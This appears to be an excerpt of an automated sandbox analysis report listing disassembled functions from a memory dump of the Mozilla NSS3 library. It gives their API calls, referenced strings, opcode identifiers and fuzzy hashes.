                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
                                                                                                                                                                                                                                                      • String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
                                                                                                                                                                                                                                                      • API String ID: 3465160547-3797173233
                                                                                                                                                                                                                                                      • Opcode ID: c4c547b6c79fe121050a7cc6770649720d0bc5cf3f08a9c25f307871a960c193
                                                                                                                                                                                                                                                      • Instruction ID: a4bbd43e482a7678535af1245585c8077715f884b546495891264e56d4c2a694
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4c547b6c79fe121050a7cc6770649720d0bc5cf3f08a9c25f307871a960c193
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC52F0B1E063019BEF11DFA4CC19FAA7BB4AF06308F154028FD09A6B41E771E955CB96
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6C4AC0C8
                                                                                                                                                                                                                                                        • Part of subcall function 6C539440: LeaveCriticalSection.KERNEL32 ref: 6C5395CD
                                                                                                                                                                                                                                                        • Part of subcall function 6C539440: TlsGetValue.KERNEL32 ref: 6C539622
                                                                                                                                                                                                                                                        • Part of subcall function 6C539440: _PR_MD_NOTIFYALL_CV.NSS3 ref: 6C53964E
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6C4AC0AE
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C5391AA
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539212
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: _PR_MD_WAIT_CV.NSS3 ref: 6C53926B
                                                                                                                                                                                                                                                        • Part of subcall function 6C460600: GetLastError.KERNEL32(?,?,?,?,?,6C4605E2), ref: 6C460642
                                                                                                                                                                                                                                                        • Part of subcall function 6C460600: TlsGetValue.KERNEL32(?,?,?,?,?,6C4605E2), ref: 6C46065D
                                                                                                                                                                                                                                                        • Part of subcall function 6C460600: GetLastError.KERNEL32 ref: 6C460678
                                                                                                                                                                                                                                                        • Part of subcall function 6C460600: PR_snprintf.NSS3(?,00000014,error %d,00000000), ref: 6C46068A
                                                                                                                                                                                                                                                        • Part of subcall function 6C460600: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C460693
                                                                                                                                                                                                                                                        • Part of subcall function 6C460600: PR_SetErrorText.NSS3(00000000,?), ref: 6C46069D
                                                                                                                                                                                                                                                        • Part of subcall function 6C460600: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,FA71756D,?,?,?,?,?,6C4605E2), ref: 6C4606CA
                                                                                                                                                                                                                                                        • Part of subcall function 6C460600: PR_SetError.NSS3(FFFFE8A9,00000000,?,?,?,?,?,6C4605E2), ref: 6C4606E6
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6C4AC0F2
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6C4AC10E
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6C4AC081
                                                                                                                                                                                                                                                        • Part of subcall function 6C539440: TlsGetValue.KERNEL32 ref: 6C53945B
                                                                                                                                                                                                                                                        • Part of subcall function 6C539440: TlsGetValue.KERNEL32 ref: 6C539479
                                                                                                                                                                                                                                                        • Part of subcall function 6C539440: EnterCriticalSection.KERNEL32 ref: 6C539495
                                                                                                                                                                                                                                                        • Part of subcall function 6C539440: TlsGetValue.KERNEL32 ref: 6C5394E4
                                                                                                                                                                                                                                                        • Part of subcall function 6C539440: TlsGetValue.KERNEL32 ref: 6C539532
                                                                                                                                                                                                                                                        • Part of subcall function 6C539440: LeaveCriticalSection.KERNEL32 ref: 6C53955D
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6C4AC068
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                                                        • Part of subcall function 6C460600: GetProcAddress.KERNEL32(?,?), ref: 6C460623
                                                                                                                                                                                                                                                      • _NSSUTIL_UTF8ToWide.NSS3(?), ref: 6C4AC14F
                                                                                                                                                                                                                                                      • PR_LoadLibraryWithFlags.NSS3 ref: 6C4AC183
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4AC18E
                                                                                                                                                                                                                                                      • PR_LoadLibrary.NSS3(?), ref: 6C4AC1A3
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6C4AC1D4
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6C4AC1F3
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2318,6C4ACA70), ref: 6C4AC210
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6C4AC22B
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6C4AC247
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6C4AC26A
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6C4AC287
                                                                                                                                                                                                                                                      • PR_UnloadLibrary.NSS3(?), ref: 6C4AC2D0
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_DEBUG_PKCS11_MODULE), ref: 6C4AC392
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C4AC3AB
                                                                                                                                                                                                                                                      • PR_NewLogModule.NSS3(nss_mod_log), ref: 6C4AC3D1
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_FORCE_TOKEN_LOCK), ref: 6C4AC782
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD), ref: 6C4AC7B5
                                                                                                                                                                                                                                                      • PR_UnloadLibrary.NSS3(?), ref: 6C4AC7CC
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE097,00000000), ref: 6C4AC82E
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C4AC8BF
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?), ref: 6C4AC8D5
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4AC900
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C4AC9C7
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4AC9E5
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4ACA5A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Monitor$Value$Enter$CriticalExitSection$Error$LeaveLibrary$Alloc_SecureUtilfree$ArenaLastLoadUnloadstrcmp$AddressCallFlagsModuleOnceProcR_snprintfTextWideWithmemcpystrlen
                                                                                                                                                                                                                                                      • String ID: FC_GetFunctionList$FC_GetInterface$NSC_GetFunctionList$NSC_GetInterface$NSC_ModuleDBFunc$NSS_DEBUG_PKCS11_MODULE$NSS_DISABLE_UNLOAD$NSS_FORCE_TOKEN_LOCK$NSS_ReturnModuleSpecData$PKCS 11$Vendor NSS FIPS Interface$nss_mod_log
                                                                                                                                                                                                                                                      • API String ID: 4243957313-3613044529
                                                                                                                                                                                                                                                      • Opcode ID: 8fa78149976e358769a2f98d835e85fdf530f8d3a693e7b9e834e0150774b093
                                                                                                                                                                                                                                                      • Instruction ID: 9914a5ae89b6dfb806de336287ea3d49d91c5d046dd2eecbc07a9fcee54b9f11
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fa78149976e358769a2f98d835e85fdf530f8d3a693e7b9e834e0150774b093
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4429FB5A003059FDB40DF95CC46F5ABBB1FB65308F014028E8169BB29E732E956CF99
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • malloc.MOZGLUE(00000008), ref: 6C583FD5
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C583FFE
                                                                                                                                                                                                                                                      • malloc.MOZGLUE(-00000003), ref: 6C584016
                                                                                                                                                                                                                                                      • strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,6C5BFC62), ref: 6C58404A
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C58407E
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C5840A4
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C5840D7
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C584112
                                                                                                                                                                                                                                                      • malloc.MOZGLUE(00000000), ref: 6C58411E
                                                                                                                                                                                                                                                      • __p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 6C58414D
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C584160
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C58416C
                                                                                                                                                                                                                                                      • malloc.MOZGLUE(?), ref: 6C5841AB
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NSPR_INHERIT_FDS=,00000011), ref: 6C5841EF
                                                                                                                                                                                                                                                      • qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,00000004,6C584520), ref: 6C584244
                                                                                                                                                                                                                                                      • GetEnvironmentStrings.KERNEL32 ref: 6C58424D
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C584263
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C584283
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5842B7
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5842E4
                                                                                                                                                                                                                                                      • malloc.MOZGLUE(00000002), ref: 6C5842FA
                                                                                                                                                                                                                                                      • FreeEnvironmentStringsA.KERNEL32(?), ref: 6C584342
                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 6C5843AB
                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 6C5843B2
                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F4), ref: 6C5843B9
                                                                                                                                                                                                                                                      • FreeEnvironmentStringsA.KERNEL32(?), ref: 6C584403
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C584410
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 6C58445E
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 6C58446B
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C584482
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C584492
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C5844A4
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C5844B2
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE896,00000000), ref: 6C5844BE
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C5844C7
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C5844D5
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C5844EA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$Errormallocstrlen$Handle$EnvironmentStringsmemset$Free$CloseCreateLastProcessValue__p__environqsortstrncmpstrpbrk
                                                                                                                                                                                                                                                      • String ID: =$D$NSPR_INHERIT_FDS=
                                                                                                                                                                                                                                                      • API String ID: 3116300875-3553733109
                                                                                                                                                                                                                                                      • Opcode ID: d54afce7b9175f5d62e1973f4a5a7d0c5437ff73d0036e5ee7f8493703f0f3d6
                                                                                                                                                                                                                                                      • Instruction ID: 28369047491135e8cceb796782b65f3bc8d5fcedb49f9f93db5ed179817a8278
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d54afce7b9175f5d62e1973f4a5a7d0c5437ff73d0036e5ee7f8493703f0f3d6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B022770E063619FEB10CF69CC547AEBBB8AF16308F254128DC56ABB41D771E905CB91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,?,6C4B601B,?,00000000,?), ref: 6C4D486F
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 6C4D48A8
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 6C4D48BE
                                                                                                                                                                                                                                                      • NSSUTIL_ArgSkipParameter.NSS3(?,?,?,?,?,00000000), ref: 6C4D48DE
                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000), ref: 6C4D48F5
                                                                                                                                                                                                                                                      • NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 6C4D490A
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6C4D4919
                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000), ref: 6C4D493F
                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D4970
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000001), ref: 6C4D49A0
                                                                                                                                                                                                                                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C4D49AD
                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D49D4
                                                                                                                                                                                                                                                      • NSSUTIL_ArgFetchValue.NSS3(00000001,?), ref: 6C4D49F4
                                                                                                                                                                                                                                                      • NSSUTIL_ArgDecodeNumber.NSS3(00000000), ref: 6C4D4A10
                                                                                                                                                                                                                                                      • NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 6C4D4A27
                                                                                                                                                                                                                                                      • NSSUTIL_ArgReadLong.NSS3(timeout,00000000,00000000,00000000), ref: 6C4D4A3D
                                                                                                                                                                                                                                                      • NSSUTIL_ArgGetParamValue.NSS3(askpw,00000000), ref: 6C4D4A4F
                                                                                                                                                                                                                                                      • PL_strcasecmp.NSS3(00000000,every), ref: 6C4D4A6C
                                                                                                                                                                                                                                                      • PL_strcasecmp.NSS3(00000000,timeout), ref: 6C4D4A81
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4D4AAB
                                                                                                                                                                                                                                                      • NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C4D4ABE
                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(00000000,hasRootCerts,0000000C), ref: 6C4D4ADC
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4D4B17
                                                                                                                                                                                                                                                      • NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C4D4B33
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4D413D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D4120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4D4162
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4D416B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D4120: PL_strncasecmp.NSS3(2BMl,?,00000001), ref: 6C4D4187
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D4120: NSSUTIL_ArgSkipParameter.NSS3(2BMl), ref: 6C4D41A0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D4120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4D41B4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D4120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 6C4D41CC
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D4120: NSSUTIL_ArgFetchValue.NSS3(2BMl,?), ref: 6C4D4203
                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(00000000,hasRootTrust,0000000C), ref: 6C4D4B53
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4D4B94
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4D4BA7
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4D4BB7
                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D4BC8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: isspace$Valuefree$L_strncasecmp$Alloc_ParamParameterSkipUtil$FetchL_strcasecmpstrlen$ArenaDecodeFlagsLongNumberParseReadSlotmemsetstrcpystrncpy
                                                                                                                                                                                                                                                      • String ID: askpw$every$hasRootCerts$hasRootTrust$rootFlags$slotFlags$timeout
                                                                                                                                                                                                                                                      • API String ID: 3791087267-1256704202
                                                                                                                                                                                                                                                      • Opcode ID: 5e7dad37dc284b67b2e2beb91f38011d4a3aa333399e1b9fc20bc1c4a9b26d95
                                                                                                                                                                                                                                                      • Instruction ID: e7edef33c227cceac4331c04802834058f915c1b7ea3aa212db52f9d94d7a7a6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e7dad37dc284b67b2e2beb91f38011d4a3aa333399e1b9fc20bc1c4a9b26d95
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4C12874E053558BEB00EFA59C60FAE7FB4AF06289F161069EC95A7B01E321B905C7A1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,6C59A8EC,0000006C), ref: 6C496DC6
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,6C59A958,0000006C), ref: 6C496DDB
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,6C59A9C4,00000078), ref: 6C496DF1
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,6C59AA3C,0000006C), ref: 6C496E06
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,6C59AAA8,00000060), ref: 6C496E1C
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C496E38
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • PK11_DoesMechanism.NSS3(?,?), ref: 6C496E76
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C49726F
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C497283
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
                                                                                                                                                                                                                                                      • String ID: !
                                                                                                                                                                                                                                                      • API String ID: 3333340300-2657877971
                                                                                                                                                                                                                                                      • Opcode ID: 3b60902260934a85e676dfeb0023df1fbbeb5c93f781a70e9a5b22825df30d05
                                                                                                                                                                                                                                                      • Instruction ID: 4071b83a5d03b888a061cc4d1c4e767c199035fff28d2b3f510991885750af0d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b60902260934a85e676dfeb0023df1fbbeb5c93f781a70e9a5b22825df30d05
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C726D75D052299FDF60DF28CC88F9ABBB5AF49304F1441A9D80DA7701EB31AA85CF91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C403C66
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6C403D04
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C403EAD
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C403ED7
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C403F74
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C404052
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C40406F
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C40410D
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011A47,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C40449C
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
